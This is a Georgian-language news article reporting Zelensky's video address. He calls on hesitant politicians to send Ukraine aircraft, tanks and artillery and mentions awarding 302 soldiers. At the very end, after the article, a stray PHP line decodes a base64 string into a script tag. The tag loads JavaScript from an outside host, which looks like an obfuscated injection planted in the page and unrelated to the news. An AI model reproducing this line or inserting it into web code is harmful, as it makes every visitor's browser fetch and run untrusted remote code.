celsiusi
ავერსი შნაიდერი
 
უკრაინის პრეზიდენტმა, ვოლოდიმერ ზელენსკიმ ტრადიციულ ვიდეომიმართვაში განაცხადა, რომ უკრაინელები არ უნდა იღუპებოდნენ იმის გამო, რომ ვიღაც პოლიტიკოსებს სიმამაცე არ ყოფნით, გადმოსცენ უკრაინას შესაბამისი შეიარაღება.
 
ზელენსკის თქმით, თუ ვინმეს, რუსეთის გამო მნიშვნელოვანი გადაწყვეტილების მიღების ეშინია, ეს ადამიანები ავტომატურად, ამ კატასტროფისთვის თანაბრად პასუხისმგებლები იქნებიან. 
 
"მიმდინარე კვირას დანიის, ნორვეგიის, ნიდერლანდების, საბერძნეთის, ავსტრალიის პარლამენტებს მივმართავ. მთავარია, რომ ეს არ იყოს გამოსვლა პოლიტიკოსების წინაშე, ეს უნდა იყოს მოქალაქეების წინაშე სიტყვით გამოსვლა. მილიონობით იმ ადამიანის წინაშე, რომლებთაც სურთ, რომ უკრაინის ხმა გაიგონ, რათა მას მხარი დაუჭირონ და დაეხმარონ. იმ ადამიანების წინაშე, რომლებიც გრძნობენ, რომ ჩვენ ვიბრძვით საერთო ღირებულებების წინააღმდეგ პრინციპით - "ერთი ყველასათვის". 
 
უკრაინელები არ უნდა იღუპებოდნენ იმის გამო, რომ ვიღაც პოლიტიკოსებს სიმამაცე არ ყოფნით, გადმოსცენ უკრაინას შესაბამისი შეიარაღება. შიში ყოველთვის გხდის თანამონაწილეს. თუ ვინმეს, რუსეთის გამო ჩვენთვის მნიშვნელოვანი გადაწყვეტილების მიღების ეშინია, რომელიც შესაბამისი თვითმფრინავების, ტანკებისა და საარტილერიო დანადგარების მიღებაში დაგვეხმარება, ეს ადამიანები ავტომატურად, ამ კატასტროფისთვის თანაბრად პასუხისმგებლები იქნებიან. 
 
ევროპისა და მსოფლიოს ერები ჩემსა და უკრაინის ხმას აუცილებლად მოისმენენ. პოლიტიკოსებს კი ვურჩევ, აქედანვე დაფიქრდნენ, რას მიიღებენ, თუ თავიანთი ერების პოზიციას შესაბამისად არ უპასუხებენ. 
 
სანამ ამ ვიდეომიმართვას ჩავწერდი და გავავრცელებდი, ჩვენი სამხედროების დაჯილდოების ბრძანებას მოვაწერე ხელი. დღეს 302 ჩვენი ჯარისკაცი დავაჯილდოვე. დიდი მადლობა თქვენ მსახურებისთვის.
 
დიდი მადლობა. დიდება ჩვენს გმირებს! დიდება უკრაინას!" – განაცხადა ზელინსკიმ. 
861
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");